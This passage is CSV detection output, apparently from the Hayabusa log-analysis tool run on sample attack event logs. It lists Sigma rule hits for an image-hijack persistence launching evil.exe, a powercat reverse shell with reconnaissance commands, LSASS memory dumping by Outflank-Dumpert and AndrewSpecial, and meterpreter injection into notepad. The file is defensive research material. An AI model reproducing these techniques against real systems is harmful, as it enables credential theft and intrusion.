365ABB72-6F72-5D0A-0000-001004551300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx 2019-06-20 02:22:58.944 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx 2019-06-20 02:23:01.928 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe | Process: C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: taskeng.exe {9AAB3F76-4849-4F03-9560-B020B4D0233D} S-1-5-18:NT AUTHORITY\System:Service: | LID: 0x3e7 | PID: 1224 | PGUID: 365ABB72-6F75-5D0A-0000-001082611300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx 2019-06-20 02:23:01.990 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe | Process: C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 272 | PGUID: 365ABB72-6F75-5D0A-0000-0010E5671300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx 2019-06-20 02:23:02.350 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\Macromed\Flash\FlashUtil32_30_0_0_134_Plugin.exe -check plugin | Process: C:\Windows\System32\Macromed\Flash\FlashUtil32_30_0_0_134_Plugin.exe | User: IEWIN7\IEUser | Parent Cmd: taskeng.exe {CF661A9C-C1B0-45D5-BC80-11E48F3A0B96} S-1-5-21-3583694148-1414552638-2922671848-1000:IEWIN7\IEUser:Interactive:LUA[1] | LID: 0x134fc | PID: 3744 | PGUID: 365ABB72-6F76-5D0A-0000-001064701300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx 2019-06-20 02:23:10.334 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x134fc | PID: 2396 | PGUID: 365ABB72-6F7C-5D0A-0000-0010FE201400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx 2019-06-20 02:23:11.694 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\windows\temp\evil.exe | Process: C:\Windows\Temp\evil.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\werfault.exe"" -s -t 3020 -i 2396 -e 2396 -c 0 | LID: 0x134fc | PID: 3800 | PGUID: 365ABB72-6F7F-5D0A-0000-0010B66E1400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx 2019-06-20 02:23:11.694 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx 2019-06-20 17:07:42.331 +09:00,IEWIN7,10,low,,Process Access,Src Process: | Tgt Process: C:\Windows\system32\NETSTAT.EXE | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 816 | Src PGUID: 365ABB72-3D05-5D0B-0000-001004220D00 | Tgt PID: 1284 | Tgt PGUID: 365ABB72-3ECE-5D0B-0000-00107F7F1A00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx 2019-06-20 17:07:42.331 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx 2019-06-20 17:07:42.331 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\NETSTAT.EXE"" -na | Process: C:\Windows\System32\NETSTAT.EXE | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13529 | PID: 1284 | PGUID: 365ABB72-3ECE-5D0B-0000-00107F7F1A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx 2019-06-20 17:07:42.331 +09:00,IEWIN7,1,low,Disc,Suspicious Listing of Network Connections,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_network_listing_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx 2019-06-20 17:07:48.909 +09:00,IEWIN7,10,low,,Process Access,Src Process: | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 816 | Src PGUID: 365ABB72-3D05-5D0B-0000-001004220D00 | Tgt PID: 888 | Tgt PGUID: 365ABB72-3ED4-5D0B-0000-00106C871A00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx 2019-06-20 17:07:48.909 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx 2019-06-20 17:07:48.909 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""cmd"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13529 | PID: 888 | PGUID: 365ABB72-3ED4-5D0B-0000-00106C871A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx 2019-06-20 17:07:48.925 +09:00,IEWIN7,10,low,,Process Access,Src Process: | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 816 | Src PGUID: 365ABB72-3D05-5D0B-0000-001004220D00 | Tgt PID: 1440 | Tgt PGUID: 365ABB72-3ED4-5D0B-0000-0010B2871A00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx 2019-06-20 17:07:48.925 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx 2019-06-20 17:07:48.925 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""cmd"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13529 | PID: 1440 | PGUID: 365ABB72-3ED4-5D0B-0000-0010B2871A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx 2019-06-20 17:07:50.378 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.13:4444 (IEWIN7) | Dst: 10.0.2.18:38208 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 816 | PGUID: 365ABB72-3D05-5D0B-0000-001004220D00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx 2019-06-20 17:07:52.956 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx 2019-06-20 17:07:52.956 +09:00,IEWIN7,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: ""cmd"" | LID: 0x13529 | PID: 1476 | PGUID: 365ABB72-3ED8-5D0B-0000-0010398F1A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx 2019-06-20 17:07:52.956 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx 2019-06-20 17:07:58.816 +09:00,IEWIN7,1,low,Disc,Suspicious Execution of Systeminfo,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_systeminfo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx 2019-06-20 17:07:58.816 +09:00,IEWIN7,1,info,,Process Created,"Cmd: systeminfo | Process: C:\Windows\System32\systeminfo.exe | User: IEWIN7\IEUser | Parent Cmd: ""cmd"" | LID: 0x13529 | PID: 3820 | PGUID: 365ABB72-3EDE-5D0B-0000-001032961A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx 2019-06-21 16:35:37.185 +09:00,alice.insecurebank.local,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: Outflank-Dumpert.exe | Process: C:\Users\administrator\Desktop\x64\Outflank-Dumpert.exe | User: insecurebank\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf6a26 | PID: 3572 | PGUID: ECAD0485-88C9-5D0C-0000-0010348C1D00 | Hash: SHA1=3A41FF5A6CDEC8829876E0486A0072BC8D13DCF1,MD5=D4940C501545BCFD11D6DC75B5D0FEC9,SHA256=38879FE4AA25044DB241B093E6A1CF904BA9F4E999041C0CC039E2D5F7ABA044,IMPHASH=88788EE624180BE467F3C32F4720AA97",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx 2019-06-21 16:35:37.185 +09:00,alice.insecurebank.local,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx 2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\Windows\Temp\dumpert.dmp | Process: C:\Users\administrator\Desktop\x64\Outflank-Dumpert.exe | PID: 3572 | PGUID: ECAD0485-88C9-5D0C-0000-0010348C1D00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx 2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Users\administrator\Desktop\x64\Outflank-Dumpert.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3572 | Src PGUID: ECAD0485-88C9-5D0C-0000-0010348C1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx 2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,11,critical,CredAccess,Dumpert Process Dumper,,../hayabusa-rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx 2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,11,high,CredAccess,LSASS Process Memory Dump Files,,../hayabusa-rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx 2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,../hayabusa-rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx 2019-06-21 16:35:37.377 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Users\administrator\Desktop\x64\Outflank-Dumpert.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3572 | Src PGUID: ECAD0485-88C9-5D0C-0000-0010348C1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx 2019-06-21 16:35:37.377 +09:00,alice.insecurebank.local,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,../hayabusa-rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx 2019-06-21 16:35:50.128 +09:00,alice.insecurebank.local,1,info,,Process Created,"Cmd: rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump | Process: C:\Windows\System32\rundll32.exe | User: insecurebank\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf6a26 | PID: 1568 | PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx 2019-06-21 16:35:50.259 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\Windows\Temp\dumpert.dmp | Process: C:\Windows\system32\rundll32.exe | PID: 1568 | PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx 2019-06-21 16:35:50.259 +09:00,alice.insecurebank.local,11,critical,CredAccess,Dumpert Process Dumper,,../hayabusa-rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx 2019-06-21 16:35:50.259 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Windows\system32\rundll32.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1568 | Src PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx 2019-06-21 16:35:50.259 +09:00,alice.insecurebank.local,11,high,CredAccess,LSASS Process Memory Dump Files,,../hayabusa-rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx 2019-06-21 16:35:50.264 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Windows\system32\rundll32.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1568 | Src PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx 2019-06-21 16:35:50.729 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\Windows\Temp\dumpert.dmp | Process: C:\Windows\system32\rundll32.exe | PID: 1568 | PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx 2019-06-21 16:35:50.729 +09:00,alice.insecurebank.local,11,critical,CredAccess,Dumpert Process Dumper,,../hayabusa-rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx 2019-06-21 16:35:50.729 +09:00,alice.insecurebank.local,11,high,CredAccess,LSASS Process Memory Dump Files,,../hayabusa-rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx 2019-06-21 16:35:50.729 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Windows\system32\rundll32.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1568 | Src PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx 2019-06-21 16:35:50.749 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Windows\system32\rundll32.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1568 | Src PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx 2019-06-21 16:36:50.450 +09:00,alice.insecurebank.local,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: AndrewSpecial.exe | Process: C:\Users\administrator\Desktop\AndrewSpecial.exe | User: insecurebank\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf6a26 | PID: 3552 | PGUID: ECAD0485-8912-5D0C-0000-0010FD2F1F00 | Hash: SHA1=FE6BEB0E26F71F8587415507B318B161FBC3338B,MD5=4791C98C096587DB8DFECD5CA894DD56,SHA256=2969E70B74A12E3B0441D0BDA498322464A8614421B00321E889756D60AB4200,IMPHASH=40B5A4911712471B34D39C3AC7E99193",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx 2019-06-21 16:36:50.450 +09:00,alice.insecurebank.local,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx 2019-06-21 16:36:51.681 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\Users\administrator\Desktop\Andrew.dmp | Process: C:\Users\administrator\Desktop\AndrewSpecial.exe | PID: 3552 | PGUID: ECAD0485-8912-5D0C-0000-0010FD2F1F00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx 2019-06-21 16:36:51.681 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Users\administrator\Desktop\AndrewSpecial.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3552 | Src PGUID: ECAD0485-8912-5D0C-0000-0010FD2F1F00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx 2019-06-21 16:36:51.682 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Users\administrator\Desktop\AndrewSpecial.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3552 | Src PGUID: ECAD0485-8912-5D0C-0000-0010FD2F1F00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx 2019-07-04 05:10:06.475 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Lateral Movement - New Named Pipe added to NullSession | SetValue: HKLM\System\CurrentControlSet\services\LanmanServer\Parameters\NullSessionPipes: Binary Data | Process: C:\Windows\system32\reg.exe | PID: 3844 | PGUID: 365ABB72-0B9E-5D1D-0000-00100BF40D00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_add_new_namedpipe_tp_nullsession_registry_turla_like_ttp.evtx 2019-07-04 05:39:29.223 +09:00,IEWIN7,10,low,,Process Access,Src Process: ㄀ | Tgt Process: C:\Windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:29.223 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.129 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.129 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.129 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.145 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.145 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.145 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.160 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.160 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.160 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.176 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 